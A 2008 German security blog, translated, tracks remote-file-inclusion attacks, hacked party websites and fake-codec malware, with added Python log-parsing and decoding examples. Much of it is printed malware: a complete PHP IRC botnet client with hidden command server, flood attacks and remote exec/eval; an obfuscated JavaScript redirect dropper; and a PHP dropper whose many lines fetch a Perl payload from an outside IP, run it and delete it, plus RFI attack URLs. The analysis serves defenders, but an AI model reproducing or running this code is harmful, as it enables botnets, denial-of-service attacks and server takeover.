Monday, November 24. 2008
Wood from Brazil - this is fuckin cr4nk
After I discovered the friendly comment from haterbreed, I ran the same Google search he did. Besides my blog here there were other results as well, for example this one: google cache of brasilwood.eu
In case the cache no longer shows the replaced page, I have put a screenshot here.

Thursday, November 6. 2008
Crank - this is fuckin cr4nk
At first I really thought "cr4nk" was a somewhat different crowd for once...

Sunday, October 12. 2008
Website of the SPD local chapter Esens-Nord hacked
So that nobody accuses me of being political, I am publishing here the link to the response file that was part of an attack on one of my domains: (...the SPD, too, helps distribute RFI/LFI/SQLI bots)
http://spd-esens.de/spd/contentimage/bid.txt
Or is something like this only interesting when it happens at the annual CCC meeting?

Friday, October 3. 2008
onspeed.com as an accelerator for hackers
According to their website, onspeed.com is a service that is supposed to speed up browsing over slow connections. If I have understood this correctly, for just under 25 dollars you get access to a service that answers browser requests from a cache with compressed data (deflate). But this also makes it possible to run RFI scans at a fairly high speed. This is not meant as advertising. I mean it seriously. onspeed has not replied to my mails so far, hence my recommendation to all admins, hostmasters and whoever else to block the following domains/IPs:
As of 3.10.2008 17:05
domain                    IP
---------------------------------------------------------
navaho.onspeed.com        72.3.137.82
yuma.onspeed.com          72.3.137.83
vanadium.onspeed.com      83.138.172.72
chromium.onspeed.com      83.138.172.76
silicon.onspeed.com       212.100.250.218
sulphur.onspeed.com       212.100.250.225
aluminium.onspeed.com     212.100.250.217
nickel.onspeed.com        212.100.250.230
Personally I have no problem being a bit more generous:
72.3.137.0/24
83.138.172.0/24
212.100.250.0/24
Here is an excerpt from the abuse mail:

Saturday, September 13. 2008
[honeyd] rfi - lists
The rush to make me a victim has meanwhile become so big that, while I am trying to write scripts, the situation has already changed so much again that I have to rethink the concept all over ;)

Wednesday, August 20. 2008
[malware] fdp.de hacked?
Apparently the fdp.de website has fallen victim to an RFI attack. In the latest summary from the Czech Honeynet Project one entry stood out:
Report of 20 August 2008
STATISTIKA PRO RFI/XSS - MALWARE
Link na malware - pocet IP - pocet utoku
http://fdp.de/vorschaltseite/did.txt - 31 - 94 - 6a608609c0535feef25f60325d2e40cb
and a second one:
http://fdp.de/vorschaltseite/id.txt - 58 - 249 - 9e816808f1debe9ebeecb08654c2d5c2
The report from the previous day contains the following entries:
http://fdp.de/vorschaltseite/did.txt - 3 - 6 - 6a608609c0535feef25f60325d2e40cb
http://fdp.de/vorschaltseite/id.txt - 28 - 163 - 9e816808f1debe9ebeecb08654c2d5c2
The address appears for the first time in the report of 17 August:
http://fdp.de/vorschaltseite/did.txt - 7 - 18 - 6a608609c0535feef25f60325d2e40cb
A Google search for fdp.de/vorschaltseite gives us certainty. Examples:
http://forums.oscommerce.de/index.php?showtopic=64731&view=getlastpost
00:00:00 libwww-perl artmam.com 13:12:02 /index.php?custompluginfile[]=http://fdp. de/vorschaltseite/id.txt
http://infolac.ucol.mx/access/ pbb_root_path=http://fdp.de/vorschaltseite/id.txt?
Although the file(s) can no longer be found on the FDP "Vorschaltseite" (landing page), we can still take a look at them:

Saturday, August 9. 2008
[malware] RFI attacks with the help of pastebin.ubuntu.com
Whether ubuntu is your preferred distribution is beside the point. Evidently, however, the pastebin's "plain" view is being abused to take over websites.
CODE:
cat rfi.txt |grep pastebin
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/?
/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???
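The grep above only finds includes hosted on one known paste site. As an added example (not part of the original post), this Python sketch parses each request URI and reports every query parameter whose value is itself a remote URL, so the same log yields the targeted script, the abused parameter and the hosting site. The function names and the two constructed sample lines are assumptions made for illustration.

```python
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Schemes a PHP include()/require() can fetch when remote includes are enabled.
REMOTE_SCHEMES = {"http", "https", "ftp"}

# Request URIs copied from the rfi.txt excerpt above.
PAGE_SAMPLES = [
    "/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???",
    "/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/?",
    "/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/?",
    "/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/",
    "/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/?",
    "/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???",
]

# Constructed lines (not from the page): a benign request and a
# percent-encoded variant that a plain-text grep for "http://" would miss.
CONSTRUCTED_SAMPLES = [
    "/index.php?page=about&lang=de",
    "/index.php?page=http%3A%2F%2Fexample.com%2Fx.txt%3F",
]


def find_remote_includes(request_uri):
    """Return one finding per query parameter whose value is a remote URL."""
    script, _, query = request_uri.partition("?")
    findings = []
    # parse_qsl percent-decodes names and values for us.
    for param, value in parse_qsl(query, keep_blank_values=True):
        try:
            target = urlsplit(value.strip())
        except ValueError:  # malformed value, e.g. a broken IPv6 literal
            continue
        if target.scheme.lower() in REMOTE_SCHEMES and target.hostname:
            findings.append({
                "script": script,            # the PHP file being probed
                "param": param,              # the include parameter abused
                "host": target.hostname,     # where the payload is hosted
                "remote_path": target.path,  # e.g. the paste id
            })
    return findings


def hosts_by_hits(request_uris):
    """Rank payload hosts by how many requests referenced them."""
    counts = Counter(
        f["host"] for uri in request_uris for f in find_remote_includes(uri)
    )
    return counts.most_common()


if __name__ == "__main__":
    for host, hits in hosts_by_hits(PAGE_SAMPLES + CONSTRUCTED_SAMPLES):
        print(f"{hits:3d}  {host}")
```

A legitimate parameter that carries a URL (a redirect target, for instance) is reported as well, so the output is a triage list rather than a verdict.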
Let's take a look at the last "pastebin" in that listing:
CODE:
<?php
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(E_ALL);
class bMain
{
var $config = array(
// "prefix" => "HOMOVAN|",
"maxnumbers" => 5,
"maxident" => 6,
"trigger" => ".",
"modes" => "-ix",
"adminhosts" => array("i.love.ircsluts.net"),
"sockbuffer" => 512,
"rejoindelay" => 900,
"cpingdelay" => 10,
"chessburstudp" => 5000,
"chessbursttcp" => 100,
"httpburst" => 20,
);
var $servers = array(
array(
"host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==",
"port" => "OTAwMA==",
"channels" => array("I21vYmZpZ2dh"),
"control" => true,
),
);
var $bots = array();
var $lastrejointime;
function bMain()
{
$this->lastrejointime = time();
}
function start()
{
foreach ($this->servers as $srv)
{
$bot = new bBot;
$bot->setnick($this->generatenick());
$bot->setcontrol($srv["control"]);
foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan);
$bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident());
$bot->lastreconnect = time();
$bot->connect();
$this->bots[] = $bot;
}
while (1) $this->heartbeat();
}
function heartbeat()
{
if (time()-$this->lastrejointime >= $this->config["rejoindelay"])
{
$this->lastrejointime = time();
$botcnt = count($this->bots);
for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans();
}
foreach ($this->bots as $botlol) {
if ($botlol->isconnected()) $botlol->parsebuffer();
elseif (time()-10 > $botlol->lastreconnect) {
/* $botlol->lastreconnect = time();
$botlol->setnick($this->generatenick());
$botlol->connect();*/
exit();
}
}
}
function generatenick()
{
/* $randnick = $this->config["prefix"];
for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9);
return $randnick;*/
$nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic");
$newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)];
for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9);
return strtolower($newnick);
}
function generateident()
{
$alph = range("a","z");
$randident = "";
for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)];
return $randident;
}
function activeconnections()
{
$concount = 0;
foreach ($this->bots as $bot)
{
if ($bot->isconnected()) $concount++;
}
return $concount;
}
function startchess($t, $h, $p, $ps, $ti)
{
/* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile();
$this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/
$ho = "";
if ($t == "udp") {
$burst = $this->config["chessburstudp"];
$ho = "udp://";
//print("using udp $burst\n");
}
elseif ($t == "tcp") {
$burst = $this->config["chessbursttcp"];
$ho = "tcp://";
//print("using tcp $burst\n");
}
//else print("else $t\n");
$ho .= $h;
$lastping = 0;
$out = "";
for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256));
$i = 0;
$pakcnt = 0;
$timei = time();
while (1) {
if ($p < 1 || $p > 65000) $po = mt_rand(1,65000);
else $po = $p;
@$fp = fsockopen($ho, $po, $errno, $errstr, 1);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
$i++;
if ($i >= $burst) {
$ctime = time();
if ($ctime - $lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$pakcnt += $i;
if ($ctime - $timei >= $ti) return $pakcnt;
else $i = 0;
}
}
}
function starthttp($url, $secs)
{
$agents = array(
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0",
"Opera/9.50 (Windows NT 5.1; U; en-GB)",
"Opera/9.50 (Windows NT 5.1; U; en-US)",
);
$parsed = parse_url($url);
if (!$parsed) return false;
$servip = gethostbyname($parsed['host']);
if (!$parsed['query']) $parsed['query'] = "";
$lastping = 0;
$i = 0;
$reqcnt = 0;
$timei = time();
while (1) {
if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) {
$packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n"
. "User-Agent: ".$agents[array_rand($agents)]."\r\n"
. "Host: ".$parsed['host']."\r\n"
. "Connection: Keep-Alive\r\n\r\n";
fwrite($sock, $packet);
fclose($sock);
}
$i++;
if ($i >= $this->config["httpburst"]) {
$ctime = time();
if ($ctime-$lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$reqcnt += $i;
if ($ctime - $timei >= $secs) return $reqcnt;
else $i = 0;
}
}
}
/* function spawnfakethreads($cmd, $qty)
{
if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd";
else $fullcmd = "$cmd > /dev/null 2>&1 &";
for ($i=0; $i<$qty; $i++) {
shell_exec($fullcmd);
}
}*/
function update($url, $killprocess, $runcmd, $sourcebot, $source)
{
//$starttime = time();
$updcode = file_get_contents($url);
if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source);
else return false;
//$destfile = $this->randtempfile();
$destfile = tempnam("/tmp", "pdata");
$fh = fopen($destfile, "w");
fwrite($fh, $updcode);
fclose($fh);
$this->spawnfakethreads($runcmd." ".$destfile, 1);
unlink($destfile);
if ($killprocess = 1) die("Updating");
}
/* function createchessfile()
{
$tmpfile = tempnam("datab", "/tmp");
$fh = fopen($tmpfile, "w");
fwrite($fh, base64_decode($this->csrc));
fclose($fh);
return $tmpfile;
}*/
}
class bBot
{
var $currenthost;
var $currentport;
var $currentident;
var $currentnick = "unset";
var $channels = array();
var $allowcontrol = false;
var $socket;
var $lastreconnect;
function setdestination($host, $port, $ident)
{
$this->currenthost = $host;
$this->currentport = $port;
$this->currentident = $ident;
}
function connect()
{
$this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5);
if (feof($this->socket))
{
print("connection error: $errstr [$errno]\n");
return false;
}
stream_set_blocking($this->socket, 0);
$this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname()."");
$this->raw("NICK ".$this->currentnick);
return true;
}
function disconnect()
{
$this->raw("QUIT :Disconnecting");
fclose($this->socket);
}
function setnick($nick, $set = false)
{
if ($set) $this->raw("NICK $nick");
$this->currentnick = $nick;
}
function setcontrol($control)
{
$this->allowcontrol = $control;
}
function joinchans()
{
foreach ($this->channels as $chan) $this->raw("JOIN $chan");
}
function raw($text)
{
fwrite($this->socket, $text."\r\n");
}
function say($text, $target, $notice = false)
{
if (!$notice) $this->raw("PRIVMSG $target :$text");
else $this->raw("NOTICE $target :$text");
}
function isconnected()
{
if ($this->socket && !feof($this->socket)) return true;
else return false;
}
function parsebuffer()
{
global $mainclass;
$buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"]));
if (!$buf || strlen($buf) < 3)
{
usleep(100000);
return false;
}
if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6));
$cmd = explode(" ", $buf);
if (isset($cmd[1]))
{
switch ($cmd[1])
{
case "001":
$this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]);
$this->joinchans();
break;
case "433":
$this->raw("NICK {$this->currentnick}");
break;
case "PRIVMSG":
if (!$this->allowcontrol) break;
$host = explode("@", $cmd[0]);
$text = substr($cmd[3], 1);
for ($i=4; $i<1024; $i++) {
if (isset($cmd[$i])) $text .= " ".$cmd[$i];
else break;
}
if (substr($text, 0, 1) == $mainclass->config["trigger"]) {
$textnoprefix = substr($text, 1);
$textsplit = explode(" ", $textnoprefix);
//if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]);
foreach ($mainclass->config["adminhosts"] as $admhost) {
if (stristr($host[1], $admhost)) {
$this->parsecommand($textsplit, $cmd[2], $cmd[0]);
break;
}
}
}
break;
case "KICK":
if ($cmd[3] == $this->currentnick) $this->joinchans();
break;
}
}
}
function parsecommand($args, $source, $hostname = "")
{
global $mainclass;
$numargs = count($args)-1;
switch ($args[0]) {
// ADMIN COMMANDS GO HERE
case "test":
$this->say("hello", $source);
break;
case "status":
$this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source);
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->say("$uname (safe: $safemode)", $source);
if ($_SERVER['SERVER_NAME'] && $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source);
break;
case "die":
$this->raw("QUIT :Die command received from $source");
die();
break;
case "chess":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source);
break;
}
if ($args[1] != "tcp" && $args[1] != "udp") {
$this->say("Invalid type specified", $source);
break;
}
$this->say("Chess starting", $source);
$psizeint = intval($args[4]);
$secsint = intval($args[5]);
$pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint);
$mbsent = round(($psizeint*$pakits)/1048576, 2);
$this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source);
break;
/* case "stopchess":
if ($mainclass->chessrunning) $this->say("Stopping chess!", $source);
else $this->say("You're not playing chess you asshat", $source);
$mainclass->stopchess = true;
break;*/
case "update":
if ($numargs < 3) {
$this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source);
break;
}
$this->say("Starting update download...", $source);
if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source);
break;
case "connections":
foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source);
break;
case "connect":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source);
break;
}
$this->say("Connecting to ".$args[1]."...", $source);
$newbot = new bBot;
if ($args[3] != "0") $newbot->setnick($args[3]);
else $newbot->setnick($mainclass->generatenick());
if ($args[5] == "1") $newbot->setcontrol(true);
else $newbot->setcontrol(false);
$newchannels = explode(",", $args[4]);
foreach ($newchannels as $newchan) $newbot->channels[] = $newchan;
$newbot->setdestination($args[1],$args[2],$mainclass->generateident());
$newbot->connect();
if ($newbot->isconnected()) {
$mainclass->bots[] = $newbot;
$this->say("Connection successful, use "disconnect" to disconnect.", $source);
}
else $this->say("Connection error!", $source);
break;
case "disconnect":
if ($numargs < 1) {
$this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source);
break;
}
$conid = intval($args[1]);
if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) {
$this->say("Invalid connection ID", $source);
break;
}
if ($mainclass->bots[$conid]->allowcontrol) {
$ctrlbots = 0;
foreach ($mainclass->bots as $bawt) {
if ($bawt->allowcontrol) $ctrlbots++;
}
if ($ctrlbots <= 1) {
$this->say("Cannot disconnect while only one control connection remaining, use "die"", $source);
break;
}
}
if (count($mainclass->bots) <= 1) {
$this->raw("QUIT :Final connection dropped, quitting");
die();
break;
}
if ($mainclass->bots[$conid]) {
$mainclass->bots[$conid]->disconnect();
unset($mainclass->bots[$conid]);
sort($mainclass->bots);
$this->say("Connection ".$args[1]." disconnected", $source);
}
else $this->say("Invalid connection ID", $source);
break;
case "exec":
$txt = "";
for ($i=1; $i<1024; $i++) {
if (isset($args[$i])) $txt .= $args[$i]." ";
else break;
}
$ph = popen($txt." 2>&1", "r");
$read = fread($ph, 8192);
$out = explode("\n", $read);
pclose($ph);
foreach ($out as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
break;
case "eval":
ob_start();
eval($args);
$outa = explode("\n", ob_get_flush());
foreach ($outa as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
ob_end_flush();
break;
case "http":
if ($numargs < 2) {
$this->say("Usage: ".$mainclass->config["trigger"]."http [url] [secs]", $source);
break;
}
$this->say("HTTP request flood starting", $source);
$requests = $mainclass->starthttp($args[1], intval($args[2]));
if ($requests && $requests > 0) $this->say("HTTP flood finished - sent ".$requests." requests", $source);
else $this->say("HTTP flood error, no requests sent", $source);
break;
}
}
}
$mainclass = new bMain;
$mainclass->start();
?>
Interesting: the base64 encoding of the server and channel variables.

Sunday, July 27. 2008
[malware] sexy codec, still.
YES, today is another one of those boring Sundays. So I might as well have a look at what our fake-porn-fake-codec people are up to. As I already described on offensivecomputing.net, new campaigns are easy to track. So here we go: let's use an old link (katsumi, pornstar!):
http://lineacount.info/cgi-bin/search?id=1706&k=katsumi&ref=
The result is:
HEAD
CODE:
HTTP/1.1 200 OK
Date: Mon, 28 Jul 2008 01:53:12 GMT
Server: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d
Connection: close
Content-Type: binary
Content:
CODE:
function g(Rl,j){if(!j){j='Q`I=h]41Je%.uy#o?p3!,W7A;-v+tiNGsZ8glrfk*MCKTm$/@B^jLdSzY&_RXDn|';}var h;var kD='';for(var I=0;I<Rl.length;I+=4){h=(j.indexOf(Rl.charAt(I))&255)<<18|(j.indexOf(Rl.charAt(I+1))&255)<<12|(j.indexOf(Rl.charAt(I+2))&255)<<(6)|j.indexOf(Rl.charAt(I+3))&255;kD+=String.fromCharCode((h&16711680)>>16,(h&65280)>>8,h&255);}eval(kD);}g('-4Dgi7dr+k?$izeMi4,*ejBj;^tKezeMt1?nJ4p/;zWm-7&L.fB/;S]Lv7D$o3e*i1p@#8X/tSDfi1iZtf,mi1eZ-f;$;SDm.Si/.k`*t=DM-=Ljy=hftfWfo!hju!J8J=@/tSuk%^i^vA`Lo8tM#^Qs');
which, once decoded, has the following content:
CODE:
document.write('<sc'+'ript> document.location="http://software-traff.com/go.php?id=341&ref=1312" </sc'+'ript>');
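The function g() above is a base64-style decoder with a shuffled 64-character alphabet whose result goes straight into eval(). As an added example (not part of the original post), this Python sketch reimplements the same bit arithmetic outside a browser and returns the text instead of executing it, then lists the URLs it contains. The alphabet and payload are copied from the script above; the function names are assumptions.

```python
import re

# Alphabet and payload copied from the script shown above.
ALPHABET = r"Q`I=h]41Je%.uy#o?p3!,W7A;-v+tiNGsZ8glrfk*MCKTm$/@B^jLdSzY&_RXDn|"
PAYLOAD = (
    r"-4Dgi7dr+k?$izeMi4,*ejBj;^tKezeMt1?nJ4p/;zWm-7&L.fB/;S]Lv7D$o3e*i1p@"
    r"#8X/tSDfi1iZtf,mi1eZ-f;$;SDm.Si/.k`*t=DM-=Ljy=hftfWfo!hju!J8J=@/tSuk"
    r"%^i^vA`Lo8tM#^Qs"
)

URL = re.compile(r"https?://[^\s\"'<>]+")


def decode_custom_b64(data, alphabet):
    """Mirror g(): four alphabet indexes -> 24 bits -> three characters.

    Nothing is evaluated; the decoded script is returned as a string.
    """
    def index(pos):
        if pos >= len(data):
            return 0  # JS: charAt() past the end is '', and indexOf('') is 0
        # JS: indexOf() of an unknown character is -1, and -1 & 255 == 255
        return alphabet.find(data[pos]) & 255

    out = []
    for i in range(0, len(data), 4):
        h = (index(i) << 18) | (index(i + 1) << 12) | (index(i + 2) << 6) | index(i + 3)
        out.append(chr((h & 0xFF0000) >> 16))
        out.append(chr((h & 0x00FF00) >> 8))
        out.append(chr(h & 0x0000FF))
    return "".join(out)


def redirect_targets(script_text):
    """List the URLs that appear in a decoded script."""
    return URL.findall(script_text)


if __name__ == "__main__":
    decoded = decode_custom_b64(PAYLOAD, ALPHABET)
    print(decoded)
    for url in redirect_targets(decoded):
        print("redirect target:", url)
```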

Saturday, June 21. 2008
[malware] adu/idku.txt??
...ever since one of my domains became established in the search engines, a few things have been coming in that I first have to "answer" :)
adu/idku.txt Google Search
CODE:
<?
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-downloadhttp://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
